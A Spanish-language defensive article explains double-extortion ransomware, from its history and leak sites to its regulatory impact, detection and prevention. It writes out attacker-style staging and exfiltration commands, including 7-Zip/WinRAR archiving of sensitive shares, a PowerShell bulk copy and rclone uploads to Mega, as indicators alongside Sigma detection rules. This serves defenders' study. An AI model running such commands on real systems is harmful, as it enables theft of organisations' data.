Doble Extorsión: Cómo el Ransomware Moderno Roba tus Datos Antes de Cifrarlos

De una extorsión a cuatro: la evolución de la presión

Hasta noviembre de 2019, el ransomware operaba con un modelo simple: cifrar archivos y pedir rescate por la clave de descifrado. Si la víctima tenía backups, restauraba y no pagaba. El atacante perdía el tiempo invertido.

El grupo Maze cambió las reglas. En noviembre de 2019, tras cifrar la red de Allied Universal (empresa de seguridad con 200.000 empleados), publicaron 700 MB de datos robados en un sitio web propio cuando la empresa se negó a pagar. El mensaje fue claro: pagar solo por el descifrado ya no era suficiente. Ahora también pagabas por el silencio.

En menos de un año, prácticamente todos los grupos de ransomware adoptaron la doble extorsión. Para 2025, según Coveware, más del 85% de los ataques de ransomware incluyen exfiltración de datos como segunda palanca de presión.

Los cuatro niveles de extorsión

Nivel	Táctica	Primera aparición	Adopción actual
Simple	Cifrar archivos, pedir rescate	CryptoLocker, 2013	Minoritaria
Doble	Exfiltrar datos + cifrar. Amenazar con publicar	Maze, noviembre 2019	Más del 85%
Triple	Doble + DDoS o contacto a clientes/socios	Avaddon, SunCrypt, 2020	15-20%
Cuádruple	Triple + notificación a reguladores o medios	BlackCat/ALPHV, 2023	Emergente

Cronología: cómo se normalizó la doble extorsión

Fecha	Evento
Nov 2019	Maze publica datos de Allied Universal. Crea el primer "leak site" dedicado
Dic 2019	Sodinokibi/REvil anuncia su propio leak site "Happy Blog"
Ene 2020	DoppelPaymer, Nemty, Nefilim adoptan doble extorsión
Mar 2020	Maze crea el "Maze Cartel": alianza con LockBit y RagnarLocker para compartir leak site
Jun 2020	Avaddon añade DDoS como tercera capa de presión (triple extorsión)
Oct 2020	SunCrypt amenaza con llamar a clientes de las víctimas
Nov 2020	Maze se disuelve. El modelo que creó se ha convertido en estándar
2021	Conti, LockBit 2.0, Hive, BlackMatter: todos con doble extorsión nativa
2022-2023	Cl0p ataca MOVEit: exfiltración masiva SIN cifrado. Solo extorsión por datos
2023	BlackCat/ALPHV presenta queja ante la SEC contra víctima que no reportó el breach
2024-2025	Doble extorsión es el estándar. Algunos grupos abandonan el cifrado por completo

El caso de Cl0p y MOVEit (2023) marcó una evolución significativa: exfiltración masiva sin cifrar nada. Cl0p explotó CVE-2023-34362 en MOVEit Transfer para robar datos de cientos de organizaciones, y publicó las víctimas en su leak site sin ejecutar ransomware. La extorsión fue puramente por los datos robados.

El proceso de exfiltración: paso a paso

Fase 1: identificación de datos de alto valor

Los operadores de ransomware no exfiltran todo. Seleccionan datos que maximizan la presión sobre la víctima:

Categoría de datos	Por qué tiene valor	Impacto si se publica
Datos de clientes (PII)	Obligaciones GDPR/NIS2. Multas regulatorias	Multas hasta 4% del revenue global, demandas colectivas
Datos financieros	Información sensible de negocio	Ventaja competitiva perdida, impacto en cotización
Contratos y acuerdos legales	Cláusulas de confidencialidad	Litigios por breach de NDA, pérdida de socios
Propiedad intelectual	Código fuente, patentes, diseños	Competidores acceden a IP, pérdida de ventaja
Datos médicos (PHI)	HIPAA, regulación sanitaria	Multas severas, demandas individuales
Credenciales y certificados	Acceso a sistemas adicionales	Compromisos secundarios, cadena de suministro
Comunicaciones internas	Emails, chats, documentos internos	Embarazo público, conflictos internos expuestos

Fase 2: staging (preparación para la exfiltración)

Los datos seleccionados se copian a una ubicación central en la red de la víctima antes de exfiltrarlos:

Patron tipico:
1. Crear directorio temporal: C:\ProgramData\temp\ o C:\Users\Public\
2. Copiar archivos seleccionados al staging directory
3. Comprimir con 7-Zip o WinRAR (a veces con password)
4. Dividir en partes de 100-500 MB para subida por chunks

Comandos habituales:

# Compresion con 7-Zip
7z.exe a -mx=3 C:\ProgramData\data.7z C:\Finance\ C:\HR\ C:\Legal\

# Compresion con WinRAR en partes de 200 MB
rar.exe a -v200m -hp[password] C:\ProgramData\exfil.rar C:\Shares\Confidential\

# PowerShell para copiar archivos selectivos
Get-ChildItem -Path \\fileserver\shares -Recurse -Include *.pdf,*.xlsx,*.docx,*.sql | 
  Where-Object { $_.Length -gt 1KB } | 
  Copy-Item -Destination C:\ProgramData\staging\

Fase 3: exfiltración

Los datos comprimidos se transfieren fuera de la red de la víctima. Las herramientas y métodos más comunes:

Herramienta	Tipo	Destino típico	Detección
Rclone	Sincronización cloud	Mega.nz, pCloud, Backblaze B2, Wasabi	Proceso rclone.exe, flags --transfers, conexiones a APIs cloud
MegaSync / MEGAcmd	Cliente Mega.nz	mega.nz	Proceso megasync.exe, tráfico a g.api.mega.co.nz
FileZilla	FTP/SFTP	Servidores controlados por el atacante	Proceso filezilla.exe, conexiones FTP/SFTP salientes
WinSCP	SCP/SFTP	Servidores controlados	Proceso winscp.exe, conexiones SSH salientes
cURL / wget	HTTP POST	Servidores C2 o cloud	Comandos curl/wget con upload de archivos grandes
Cobalt Strike	C2 channel	Servidor C2 del atacante	Tráfico beacon, named pipes
StealBit (LockBit)	Tool propietaria	Infraestructura LockBit	Binario desconocido, conexiones a IPs LockBit
ExMatter (BlackMatter/BlackCat)	Tool propietaria	Infraestructura del grupo	SFTP hacia IPs específicas
Exbyte (BlackByte)	Tool propietaria	Mega.nz	Subida automatizada a Mega

Rclone: la herramienta favorita

Rclone merece mención especial por su prevalencia. Es una herramienta legítima de sincronización cloud (open source, usada por sysadmins). Los atacantes la prefieren porque:

• Soporta docenas de proveedores cloud (Mega, pCloud, Google Drive, AWS S3, Azure Blob)
• Permite transferencias paralelas y reanudación tras interrupciones
• Es un binario legítimo que muchos EDRs no bloquean por defecto
• Se configura con un archivo de texto (rclone.conf) que contiene las credenciales del servicio cloud

Detección de Rclone:

# Indicadores en linea de comando
rclone.exe copy C:\staging\ mega:exfil/ --transfers 8 --bwlimit 50M
rclone.exe sync \\fileserver\shares remote:dump --include "*.{pdf,xlsx,docx}"

# Indicadores en red
Conexiones a: g.api.mega.co.nz, eapi.pcloud.com, api.backblazeb2.com
Volumen de upload anomalo (gigabytes en horario no laboral)

Abuso de servicios cloud legítimos

Una tendencia creciente es usar servicios cloud corporativos legítimos para la exfiltración:

• Google Drive / OneDrive: si la víctima usa Microsoft 365 o Google Workspace, el atacante puede instalar el cliente de sincronización con credenciales robadas y sincronizar datos a una cuenta controlada
• Dropbox: transferencias que se mezclan con tráfico legítimo de la empresa
• AWS S3: si hay credenciales de AWS en la red, crear un bucket en otra cuenta y copiar datos

Esta técnica es especialmente difícil de detectar porque el tráfico va a dominios legítimos que no se pueden bloquear sin romper operaciones de la empresa.

Leak sites: anatomía de un sitio de filtraciones

Cómo operan

Los leak sites son sitios web en la red Tor (.onion) donde los grupos de ransomware publican información sobre sus víctimas. Funcionan como una combinación de escaparate público y mecanismo de presión.

Estructura típica de un leak site:

1. Página principal: lista de víctimas con nombre, sector, país y fecha
2. Countdown timer: reloj que cuenta hacia atrás hasta la publicación de datos
3. Partial leak: muestra de archivos robados como prueba (capturas de pantalla de documentos, listados de directorios, fragmentos de bases de datos)
4. Full dump: descarga completa de los datos robados (disponible tras expirar el countdown si no se paga)
5. Archivo: víctimas anteriores cuyos datos ya fueron publicados

Psicología del countdown

El countdown timer es una herramienta de presión psicológica calculada:

• Countdown inicial: 7-14 días típicamente. Suficiente para que la víctima evalúe el daño y contacte al grupo
• Partial leak: a los 3-5 días se publica una muestra para demostrar que los datos son reales. Frecuentemente incluyen documentos con nombres de clientes, nóminas o contratos
• Extension: si la víctima está negociando, el countdown puede pausarse o extenderse
• Publicación: si la víctima no paga, los datos completos se publican para descarga

Leak sites notables (2024-2025)

Grupo	Nombre del leak site	Características
LockBit	"LockBit Blog"	Ranking de afiliados, estadísticas de víctimas. Incautado en Operation Cronos (feb 2024)
BlackCat/ALPHV	"ALPHV Leaks"	Interfaz sofisticada, búsqueda por sector. Exit scam marzo 2024
Cl0p	"CL0P^_- LEAKS"	Publicación masiva de víctimas MOVEit. Cientos de entradas en 2023
Black Basta	Leak site dedicado	Publicación regular, principalmente sector industrial y sanitario
Play	"PLAY NEWS"	Diseño minimalista, foco en empresas europeas
RansomHub	RansomHub Blog	Emergente en 2024, absorbió afiliados de ALPHV
Medusa	Medusa Blog	Vídeos de datos robados como presión adicional

Searchable leak sites

Algunos grupos han ido más allá de publicar archivos para descarga. BlackCat/ALPHV creó sitios web donde los datos robados eran buscables: empleados de la víctima podían buscar su propio nombre para ver qué datos personales se habían exfiltrado. Esta táctica presiona a los empleados individuales para que presionen a su empresa para que pague.

Impacto de la publicación de datos

Impacto regulatorio

La publicación de datos personales en un leak site constituye un data breach bajo las principales regulaciones:

Regulación	Ámbito	Consecuencias
GDPR (UE)	Datos personales de ciudadanos UE	Multa hasta 20M EUR o 4% del revenue global. Notificación a autoridad en 72 horas. Notificación a afectados "sin dilación indebida"
NIS2 (UE)	Entidades esenciales e importantes (17 sectores)	Multas hasta 10M EUR o 2% del revenue. Requisitos de notificación en 24h (alerta inicial) y 72h (informe detallado)
HIPAA (EEUU)	Datos de salud (PHI)	Multas hasta 1,5M USD por categoría de violación
CCPA/CPRA (California)	Datos personales de residentes de California	Multas 2.500-7.500 USD por registro
LOPDGDD (España)	Datos personales en España	Multas hasta 20M EUR, alineado con GDPR

Impacto reputacional

Más allá de las multas, la publicación de datos tiene consecuencias de negocio:

• Pérdida de clientes: clientes cuyos datos fueron expuestos migran a competidores
• Pérdida de socios: empresas B2B reconsideran relaciones con proveedores que sufrieron breaches
• Impacto en cotización: empresas cotizadas experimentan caídas de 3-7% en las semanas posteriores a un breach público
• Litigios: demandas colectivas (class action) por parte de afectados
• Coste de remediación: notificación a afectados, servicios de monitorización de crédito, consultoría legal

Impacto legal: el caso ALPHV vs MeridianLink

En noviembre de 2023, BlackCat/ALPHV presentó una queja formal ante la SEC (Securities and Exchange Commission) de Estados Unidos contra MeridianLink, alegando que la empresa no había reportado el breach como exigen las nuevas reglas de la SEC. Fue la primera vez que un grupo de ransomware usó un regulador como arma contra su víctima.

Este movimiento marcó un precedente: los grupos de ransomware están dispuestos a usar los propios marcos regulatorios contra las víctimas para aumentar la presión.

Triple extorsión: más allá de cifrado y datos

DDoS como tercera capa

Varios grupos han añadido ataques de denegación de servicio distribuido (DDoS) como tercera capa de presión:

• Avaddon (2020): primer grupo en combinar ransomware + exfiltración + DDoS de forma sistemática
• SunCrypt (2020): DDoS contra el sitio web público de la víctima durante la negociación
• REvil (2021): ofreció DDoS como servicio adicional a sus afiliados

El DDoS tiene un objetivo específico: impedir que la víctima opere normalmente mientras decide si pagar. Si la empresa está caída por el cifrado Y su sitio web está bajo DDoS, la presión para pagar rápido aumenta.

Contacto directo con terceros

La táctica más agresiva: contactar directamente a clientes, empleados o socios de la víctima cuyos datos fueron robados:

• Emails a clientes: "Sus datos personales fueron robados de [empresa]. Si [empresa] no paga, sus datos serán publicados."
• Llamadas telefónicas: algunos grupos han llamado a la centralita de la víctima amenazando con publicar datos
• Contacto con medios de comunicación: enviar muestras de datos a periodistas para generar cobertura mediática

Notificación a reguladores

Como demostró el caso ALPHV/MeridianLink, los grupos de ransomware están dispuestos a notificar a reguladores (SEC, ICO, AEPD, CNIL) sobre breaches no reportados. Esto convierte la inacción regulatoria de la víctima en una vulnerabilidad adicional.

Cuádruple extorsión y tácticas emergentes

Las tácticas de presión siguen evolucionando:

Ataques a clientes directos: en vez de solo amenazar con publicar datos de clientes, atacar directamente a los clientes de la víctima usando credenciales robadas durante el breach. Esto convierte un ataque a una empresa en un ataque a toda su cadena de valor.

Extorsión sin cifrado: la tendencia iniciada por Cl0p con MOVEit. Robar datos y extorsionar sin ejecutar ransomware. Ventajas para el atacante: menos detección (no hay cifrado masivo que active alertas), menos evidencia forense, y la presión regulatoria es la misma.

Insider threat creation: algunos grupos han intentado reclutar empleados de las víctimas ofreciéndoles un porcentaje del rescate a cambio de facilitar el acceso o retrasar la respuesta al incidente.

Venta de datos a competidores: aunque no documentado de forma verificable, varios grupos han amenazado con vender propiedad intelectual (código fuente, patentes, fórmulas) a competidores de la víctima en vez de publicarla gratuitamente.

Detección de exfiltración: estrategias

Monitorización de red

Indicador	Descripción	Herramienta
Volumen de egress anómalo	Gigabytes de datos saliendo en horario no laboral	NDR, NetFlow, firewall
Destinos inusuales	Conexiones a IPs/dominios no habituales en el baseline	SIEM, proxy logs
Servicios cloud no corporativos	Conexiones a mega.nz, pcloud.com, transfer.sh desde endpoints corporativos	Proxy, DNS logs
Protocolo inusual	FTP/SFTP/SCP desde workstations que normalmente no lo usan	Firewall, NDR
Conexiones largas	Sesiones TCP de horas con transferencia de datos sostenida	NDR, NetFlow

Detección en endpoint

Indicador	Descripción	Herramienta
Proceso Rclone	rclone.exe, rclone.conf en disco	EDR, Sysmon
Proceso MegaSync	megasync.exe, megacmd.exe	EDR
7-Zip/WinRAR masivo	Compresión de archivos en directorio staging	EDR, file monitoring
PowerShell con Copy-Item masivo	Scripts que copian miles de archivos a una ubicación	PowerShell logging
Acceso masivo a shares de red	Un solo usuario leyendo miles de archivos de múltiples shares	File audit logs (Event ID 4663)

Reglas de detección

Regla Sigma para detección de Rclone:

title: Rclone Execution for Data Exfiltration
status: stable
logsource:
    category: process_creation
    product: windows
detection:
    selection_process:
        Image|endswith:
            - '\rclone.exe'
        CommandLine|contains:
            - 'copy'
            - 'sync'
            - 'move'
    selection_cloud:
        CommandLine|contains:
            - 'mega'
            - 'pcloud'
            - 'ftp'
            - 'sftp'
            - 's3'
            - 'b2'
    condition: selection_process and selection_cloud
level: high
tags:
    - attack.exfiltration
    - attack.t1567

Regla Sigma para staging con compresión:

title: Suspicious Archive Creation in Staging Directory
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\7z.exe'
            - '\7za.exe'
            - '\rar.exe'
            - '\WinRAR.exe'
        CommandLine|contains:
            - 'ProgramData'
            - 'Users\Public'
            - 'Temp'
    filter:
        User|contains: 'SYSTEM'
    condition: selection and not filter
level: medium
tags:
    - attack.collection
    - attack.t1560.001

Data Loss Prevention (DLP)

Las soluciones DLP pueden detectar exfiltración si están configuradas para monitorizar:

• Contenido sensible: números de tarjetas de crédito, números de seguridad social, datos de salud
• Volumen: alertar cuando un usuario descarga o transfiere más de N GB en un período
• Destino: bloquear o alertar en transferencias a servicios de almacenamiento cloud no aprobados
• Clasificación: archivos marcados como "Confidencial" o "Restringido" que se mueven fuera de la red

Prevención: reducir la superficie de exfiltración

Segmentación de red

La medida más efectiva es limitar qué puede salir de la red:

• Egress filtering: bloquear todo tráfico saliente por defecto y permitir solo destinos necesarios (allowlist)
• Proxy obligatorio: forzar todo tráfico HTTP/HTTPS a pasar por un proxy con inspección SSL
• Bloqueo de cloud storage: bloquear acceso a mega.nz, pcloud.com, transfer.sh, etc. desde la red corporativa
• Segmentación interna: los servidores de archivos y bases de datos no deberían poder conectarse directamente a Internet

Clasificación de datos

Saber dónde están los datos sensibles antes de un ataque:

• Inventario de datos críticos: dónde están, quién tiene acceso, cuál es su clasificación
• Etiquetado automático con herramientas DLP
• Principio de mínimo privilegio: no todos los usuarios necesitan acceso a todos los shares

Monitorización de acceso a archivos

• Habilitar auditoría de acceso a archivos en file servers (Event ID 4663)
• Alertar en patrones de acceso masivo: un usuario que lee miles de archivos en minutos no es comportamiento normal
• Honeypots de archivos: colocar documentos señuelo ("Salarios_2026.xlsx", "Contratos_Confidenciales.pdf") en shares sensibles y alertar cuando se accede a ellos

Lo que viene después

Este artículo ha cubierto la doble extorsión desde la operativa de exfiltración hasta el impacto regulatorio. La serie continúa con el análisis detallado de las familias de ransomware más relevantes: Conti (y sus leaks que revelaron la estructura interna de un grupo de ransomware), LockBit (el programa RaaS más prolífico hasta su disrupción), y BlackCat/ALPHV (la primera familia major en Rust con innovaciones en extorsión).

---

Fuentes y referencias

• Coveware. "Quarterly Ransomware Report Q4 2024." Coveware by Veeam, 2025.
• CISA. "Stop Ransomware: Understanding Ransomware Data Exfiltration." CISA, 2024.
• Mandiant. "M-Trends 2025 Report." Google Cloud Security, 2025.
• ENISA. "ENISA Threat Landscape 2024." European Union Agency for Cybersecurity, 2024.
• Sophos. "The State of Ransomware 2025." Sophos, 2025.
• BleepingComputer. "Maze Ransomware Releases Files Stolen from Allied Universal." November 2019.
• The Record. "ALPHV Ransomware Files SEC Complaint Against MeridianLink." November 2023.
• CrowdStrike. "2024 Global Threat Report." CrowdStrike, 2024.
• SEC. "SEC Adopts Rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure." July 2023.
• Progress Software. "MOVEit Transfer Critical Vulnerability (CVE-2023-34362)." 2023.
• SigmaHQ. "Sigma Rules for Ransomware Detection." https://github.com/SigmaHQ/sigma
• Red Canary. "2024 Threat Detection Report." Red Canary, 2024.
• Chainalysis. "The 2024 Crypto Crime Report." Chainalysis, 2024.
• GDPR. Regulation (EU) 2016/679. Official Journal of the European Union.
• NIS2 Directive. Directive (EU) 2022/2555. Official Journal of the European Union.